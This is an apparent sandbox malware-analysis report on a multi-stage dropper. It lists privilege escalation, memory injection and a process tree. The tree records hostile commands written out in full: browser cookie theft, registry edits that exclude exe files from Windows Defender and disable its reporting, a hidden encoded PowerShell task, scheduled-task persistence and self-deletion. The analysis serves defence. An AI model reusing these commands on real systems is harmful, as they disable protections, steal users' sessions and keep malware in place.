2352
2352
2352
2352
2352
2352
2352
2352
2352

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2352
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

jobiea_2.exe

pid process

1712 jobiea_2.exe

pid	process
2352

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

jobiea_8.exejobiea_6.exetaskkill.exejobiea_4.exeLtJ1felGu4soIKXp5Dgh3jVw.exe2WFg0YAugxukCc09BdDeLTto.exemN0k00SdRwavvkQ7x66BxjkN.exeJ9seiawQNMMR4_E62x1Rv0gr.exewaJBZNSEJ4XbfLA8DjYTY7v3.exe

description	pid	process
Token: SeCreateTokenPrivilege	1004	jobiea_8.exe
Token: SeAssignPrimaryTokenPrivilege	1004	jobiea_8.exe
Token: SeLockMemoryPrivilege	1004	jobiea_8.exe
Token: SeIncreaseQuotaPrivilege	1004	jobiea_8.exe
Token: SeMachineAccountPrivilege	1004	jobiea_8.exe
Token: SeTcbPrivilege	1004	jobiea_8.exe
Token: SeSecurityPrivilege	1004	jobiea_8.exe
Token: SeTakeOwnershipPrivilege	1004	jobiea_8.exe
Token: SeLoadDriverPrivilege	1004	jobiea_8.exe
Token: SeSystemProfilePrivilege	1004	jobiea_8.exe
Token: SeSystemtimePrivilege	1004	jobiea_8.exe
Token: SeProfSingleProcessPrivilege	1004	jobiea_8.exe
Token: SeIncBasePriorityPrivilege	1004	jobiea_8.exe
Token: SeCreatePagefilePrivilege	1004	jobiea_8.exe
Token: SeCreatePermanentPrivilege	1004	jobiea_8.exe
Token: SeBackupPrivilege	1004	jobiea_8.exe
Token: SeRestorePrivilege	1004	jobiea_8.exe
Token: SeShutdownPrivilege	1004	jobiea_8.exe
Token: SeDebugPrivilege	1004	jobiea_8.exe
Token: SeAuditPrivilege	1004	jobiea_8.exe
Token: SeSystemEnvironmentPrivilege	1004	jobiea_8.exe
Token: SeChangeNotifyPrivilege	1004	jobiea_8.exe
Token: SeRemoteShutdownPrivilege	1004	jobiea_8.exe
Token: SeUndockPrivilege	1004	jobiea_8.exe
Token: SeSyncAgentPrivilege	1004	jobiea_8.exe
Token: SeEnableDelegationPrivilege	1004	jobiea_8.exe
Token: SeManageVolumePrivilege	1004	jobiea_8.exe
Token: SeImpersonatePrivilege	1004	jobiea_8.exe
Token: SeCreateGlobalPrivilege	1004	jobiea_8.exe
Token: 31	1004	jobiea_8.exe
Token: 32	1004	jobiea_8.exe
Token: 33	1004	jobiea_8.exe
Token: 34	1004	jobiea_8.exe
Token: 35	1004	jobiea_8.exe
Token: SeDebugPrivilege	1432	jobiea_6.exe
Token: SeDebugPrivilege	5004	taskkill.exe
Token: SeDebugPrivilege	4848	jobiea_4.exe
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeDebugPrivilege	524	LtJ1felGu4soIKXp5Dgh3jVw.exe
Token: SeDebugPrivilege	4312	2WFg0YAugxukCc09BdDeLTto.exe
Token: SeDebugPrivilege	1452	mN0k00SdRwavvkQ7x66BxjkN.exe
Token: SeDebugPrivilege	3900	J9seiawQNMMR4_E62x1Rv0gr.exe
Token: SeDebugPrivilege	1340	waJBZNSEJ4XbfLA8DjYTY7v3.exe
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c180f3fba35f7ddd50e5fa0ffc04d71fc12d85a7eafa64d06fe57ec88cc9b75f.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exejobiea_5.exejobiea_1.exejobiea_9.exe

description	pid	process	target process
PID 3056 wrote to memory of 3716	3056	c180f3fba35f7ddd50e5fa0ffc04d71fc12d85a7eafa64d06fe57ec88cc9b75f.exe	setup_install.exe
PID 3056 wrote to memory of 3716	3056	c180f3fba35f7ddd50e5fa0ffc04d71fc12d85a7eafa64d06fe57ec88cc9b75f.exe	setup_install.exe
PID 3056 wrote to memory of 3716	3056	c180f3fba35f7ddd50e5fa0ffc04d71fc12d85a7eafa64d06fe57ec88cc9b75f.exe	setup_install.exe
PID 3716 wrote to memory of 4688	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4688	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4688	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4132	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4132	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4132	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 368	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 368	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 368	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4144	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4144	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4144	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4040	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4040	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4040	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 5056	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 5056	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 5056	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 3944	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 3944	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 3944	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4120	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4120	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 4120	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 3964	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 3964	3716	setup_install.exe	cmd.exe
PID 3716 wrote to memory of 3964	3716	setup_install.exe	cmd.exe
PID 4132 wrote to memory of 1712	4132	cmd.exe	jobiea_2.exe
PID 4132 wrote to memory of 1712	4132	cmd.exe	jobiea_2.exe
PID 4132 wrote to memory of 1712	4132	cmd.exe	jobiea_2.exe
PID 4120 wrote to memory of 1004	4120	cmd.exe	jobiea_8.exe
PID 4120 wrote to memory of 1004	4120	cmd.exe	jobiea_8.exe
PID 4120 wrote to memory of 1004	4120	cmd.exe	jobiea_8.exe
PID 4688 wrote to memory of 4480	4688	cmd.exe	jobiea_1.exe
PID 4688 wrote to memory of 4480	4688	cmd.exe	jobiea_1.exe
PID 4688 wrote to memory of 4480	4688	cmd.exe	jobiea_1.exe
PID 3944 wrote to memory of 1388	3944	cmd.exe	jobiea_7.exe
PID 3944 wrote to memory of 1388	3944	cmd.exe	jobiea_7.exe
PID 3944 wrote to memory of 1388	3944	cmd.exe	jobiea_7.exe
PID 4144 wrote to memory of 1340	4144	cmd.exe	jobiea_4.exe
PID 4144 wrote to memory of 1340	4144	cmd.exe	jobiea_4.exe
PID 4144 wrote to memory of 1340	4144	cmd.exe	jobiea_4.exe
PID 5056 wrote to memory of 1432	5056	cmd.exe	jobiea_6.exe
PID 5056 wrote to memory of 1432	5056	cmd.exe	jobiea_6.exe
PID 3964 wrote to memory of 2248	3964	cmd.exe	jobiea_9.exe
PID 3964 wrote to memory of 2248	3964	cmd.exe	jobiea_9.exe
PID 3964 wrote to memory of 2248	3964	cmd.exe	jobiea_9.exe
PID 4040 wrote to memory of 4072	4040	cmd.exe	jobiea_5.exe
PID 4040 wrote to memory of 4072	4040	cmd.exe	jobiea_5.exe
PID 4040 wrote to memory of 4072	4040	cmd.exe	jobiea_5.exe
PID 368 wrote to memory of 2996	368	cmd.exe	jobiea_3.exe
PID 368 wrote to memory of 2996	368	cmd.exe	jobiea_3.exe
PID 368 wrote to memory of 2996	368	cmd.exe	jobiea_3.exe
PID 4072 wrote to memory of 4308	4072	jobiea_5.exe	jobiea_5.tmp
PID 4072 wrote to memory of 4308	4072	jobiea_5.exe	jobiea_5.tmp
PID 4072 wrote to memory of 4308	4072	jobiea_5.exe	jobiea_5.tmp
PID 4480 wrote to memory of 208	4480	jobiea_1.exe	jobiea_1.exe
PID 4480 wrote to memory of 208	4480	jobiea_1.exe	jobiea_1.exe
PID 4480 wrote to memory of 208	4480	jobiea_1.exe	jobiea_1.exe
PID 2248 wrote to memory of 3340	2248	jobiea_9.exe	jfiag3g_gg.exe
PID 2248 wrote to memory of 3340	2248	jobiea_9.exe	jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\c180f3fba35f7ddd50e5fa0ffc04d71fc12d85a7eafa64d06fe57ec88cc9b75f.exe
"C:\Users\Admin\AppData\Local\Temp\c180f3fba35f7ddd50e5fa0ffc04d71fc12d85a7eafa64d06fe57ec88cc9b75f.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3056

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_9.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3964

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_9.exe
jobiea_9.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2248

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:3340

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"
5⤵
- Executes dropped EXE
PID:3552

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:3316

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
5⤵
- Executes dropped EXE
PID:3696

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:1228

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
5⤵
- Executes dropped EXE
PID:1356

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:2552

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
5⤵
- Executes dropped EXE
PID:4544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_8.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4120

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_8.exe
jobiea_8.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1004

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:972

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_7.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3944

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_7.exe
jobiea_7.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:1388

C:\Users\Admin\Documents\LtJ1felGu4soIKXp5Dgh3jVw.exe
"C:\Users\Admin\Documents\LtJ1felGu4soIKXp5Dgh3jVw.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:524

C:\Users\Admin\Documents\2WFg0YAugxukCc09BdDeLTto.exe
"C:\Users\Admin\Documents\2WFg0YAugxukCc09BdDeLTto.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:4312

C:\Users\Admin\AppData\Local\Temp\78ccec3f-f9fc-4df0-b04a-e2b8059fb177.exe
"C:\Users\Admin\AppData\Local\Temp\78ccec3f-f9fc-4df0-b04a-e2b8059fb177.exe"
6⤵
- Executes dropped EXE
PID:4860

C:\Users\Admin\Documents\qr1FieOxalJHqDh7zRadDXB3.exe
"C:\Users\Admin\Documents\qr1FieOxalJHqDh7zRadDXB3.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1544

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
PID:4308

C:\Users\Admin\Documents\waJBZNSEJ4XbfLA8DjYTY7v3.exe
"C:\Users\Admin\Documents\waJBZNSEJ4XbfLA8DjYTY7v3.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Users\Admin\Documents\tvh4PYp4mpfBXbNEU0dFPJQg.exe
"C:\Users\Admin\Documents\tvh4PYp4mpfBXbNEU0dFPJQg.exe"
5⤵
- Executes dropped EXE
PID:1512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 624
6⤵
- Program crash
PID:380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 660
6⤵
- Program crash
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 640
6⤵
- Program crash
PID:3056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 828
6⤵
- Program crash
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 1228
6⤵
- Program crash
PID:5392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 1236
6⤵
- Program crash
PID:1672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 1312
6⤵
- Program crash
PID:5356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 1328
6⤵
- Program crash
PID:5612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "tvh4PYp4mpfBXbNEU0dFPJQg.exe" /f & erase "C:\Users\Admin\Documents\tvh4PYp4mpfBXbNEU0dFPJQg.exe" & exit
6⤵
PID:5820

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "tvh4PYp4mpfBXbNEU0dFPJQg.exe" /f
7⤵
- Kills process with taskkill
PID:5884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 1360
6⤵
- Program crash
PID:6024

C:\Users\Admin\Documents\oxOJGlfM7qoCBNV2ezhKfyu8.exe
"C:\Users\Admin\Documents\oxOJGlfM7qoCBNV2ezhKfyu8.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1332

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
PID:2020

C:\Users\Admin\Documents\Upy9ojVxh5Va9Al2R4Pph7BU.exe
"C:\Users\Admin\Documents\Upy9ojVxh5Va9Al2R4Pph7BU.exe"
5⤵
- Executes dropped EXE
PID:3588

C:\Users\Admin\AppData\Local\Temp\7zS1D35.tmp\Install.exe
.\Install.exe
6⤵
- Executes dropped EXE
PID:4452

C:\Users\Admin\AppData\Local\Temp\7zS34C4.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
- Executes dropped EXE
PID:4656

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
8⤵
PID:5480

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
9⤵
PID:6120

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
10⤵
PID:4700

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
10⤵
PID:5504

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
8⤵
PID:5860

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
9⤵
PID:6080

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
10⤵
PID:6128

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
10⤵
PID:4884

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gYKDWfjSk" /SC once /ST 05:22:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
8⤵
- Creates scheduled task(s)
PID:5320

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gYKDWfjSk"
8⤵
- Blocklisted process makes network request
PID:2020

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gYKDWfjSk"
8⤵
PID:4288

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 16:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\ZBeuYCs.exe\" j6 /site_id 525403 /S" /V1 /F
8⤵
- Creates scheduled task(s)
PID:4548

C:\Users\Admin\Documents\ZMxhCYf06YJTiaqv0B8YkpgX.exe
"C:\Users\Admin\Documents\ZMxhCYf06YJTiaqv0B8YkpgX.exe"
5⤵
PID:444

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
PID:3628

C:\Users\Admin\Documents\PrUQl1KDkuP7SNBQJLAjNzqT.exe
"C:\Users\Admin\Documents\PrUQl1KDkuP7SNBQJLAjNzqT.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3048

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
PID:4576

C:\Users\Admin\Documents\XikSgapKZHI5wFzl8CKSDkfW.exe
"C:\Users\Admin\Documents\XikSgapKZHI5wFzl8CKSDkfW.exe"
5⤵
- Executes dropped EXE
PID:1868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 432
6⤵
- Program crash
PID:60

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 440
6⤵
- Program crash
PID:4380

C:\Users\Admin\Documents\HrkxmOFshF3h5R6Gr3PiepCr.exe
"C:\Users\Admin\Documents\HrkxmOFshF3h5R6Gr3PiepCr.exe"
5⤵
PID:2836

C:\Users\Admin\Documents\bneq8T3bG6_CLctwaavsv8D8.exe
"C:\Users\Admin\Documents\bneq8T3bG6_CLctwaavsv8D8.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1916

C:\Users\Admin\Documents\bneq8T3bG6_CLctwaavsv8D8.exe
"C:\Users\Admin\Documents\bneq8T3bG6_CLctwaavsv8D8.exe"
6⤵
- Executes dropped EXE
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 548
7⤵
- Program crash
PID:4744

C:\Users\Admin\Documents\UeXNFcOHMv6F5tLSqDx8tzS_.exe
"C:\Users\Admin\Documents\UeXNFcOHMv6F5tLSqDx8tzS_.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im UeXNFcOHMv6F5tLSqDx8tzS_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\UeXNFcOHMv6F5tLSqDx8tzS_.exe" & del C:\ProgramData\*.dll & exit
6⤵
PID:1964

C:\Windows\SysWOW64\taskkill.exe
taskkill /im UeXNFcOHMv6F5tLSqDx8tzS_.exe /f
7⤵
- Kills process with taskkill
PID:5584

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:5672

C:\Users\Admin\Documents\a85JBdYxVEYEqXq9dd2HmxHs.exe
"C:\Users\Admin\Documents\a85JBdYxVEYEqXq9dd2HmxHs.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2552

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
PID:4496

C:\Users\Admin\Documents\B8vU8f2pa0FVIN73V2a91Rf6.exe
"C:\Users\Admin\Documents\B8vU8f2pa0FVIN73V2a91Rf6.exe"
5⤵
- Executes dropped EXE
PID:4960

C:\Users\Admin\Documents\J9seiawQNMMR4_E62x1Rv0gr.exe
"C:\Users\Admin\Documents\J9seiawQNMMR4_E62x1Rv0gr.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3900

C:\Users\Admin\Documents\3dZw0mQvxkvejyYXpFW8wB_H.exe
"C:\Users\Admin\Documents\3dZw0mQvxkvejyYXpFW8wB_H.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:3880

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 3dZw0mQvxkvejyYXpFW8wB_H.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\3dZw0mQvxkvejyYXpFW8wB_H.exe" & del C:\ProgramData\*.dll & exit
6⤵
PID:4864

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 3dZw0mQvxkvejyYXpFW8wB_H.exe /f
7⤵
- Kills process with taskkill
PID:5576

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:5656

C:\Users\Admin\Documents\FCHJHCDekamwNpDngZayoz6F.exe
"C:\Users\Admin\Documents\FCHJHCDekamwNpDngZayoz6F.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2004

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
PID:2256

C:\Users\Admin\Documents\X2tHyRfbLCiSEGvxRfHP9KDn.exe
"C:\Users\Admin\Documents\X2tHyRfbLCiSEGvxRfHP9KDn.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
PID:3412

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
6⤵
- Creates scheduled task(s)
PID:4340

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
6⤵
- Creates scheduled task(s)
PID:3948

C:\Users\Admin\Documents\I2gl2vrXgHDwgJP15ds0diai.exe
"C:\Users\Admin\Documents\I2gl2vrXgHDwgJP15ds0diai.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4064

C:\Users\Admin\Pictures\Adobe Films\aHzbLy_FCDjzgEKxXGF5BVQV.exe
"C:\Users\Admin\Pictures\Adobe Films\aHzbLy_FCDjzgEKxXGF5BVQV.exe"
7⤵
PID:2512

C:\Users\Admin\Pictures\Adobe Films\rInZ1ObUNTF6DWKsX4JAw87r.exe
"C:\Users\Admin\Pictures\Adobe Films\rInZ1ObUNTF6DWKsX4JAw87r.exe"
7⤵
PID:4372

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
8⤵
PID:5968

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
9⤵
PID:5152

C:\Users\Admin\Pictures\Adobe Films\r2LYv3D2JqeXDKlYppPD0ZZ_.exe
"C:\Users\Admin\Pictures\Adobe Films\r2LYv3D2JqeXDKlYppPD0ZZ_.exe"
7⤵
PID:2480

C:\Users\Admin\AppData\Local\Temp\7zSAF44.tmp\Install.exe
.\Install.exe
8⤵
PID:6064

C:\Users\Admin\AppData\Local\Temp\7zSDFC9.tmp\Install.exe
.\Install.exe /S /site_id "525403"
9⤵
PID:5216

C:\Windows\SysWOW64\forfiles.exe
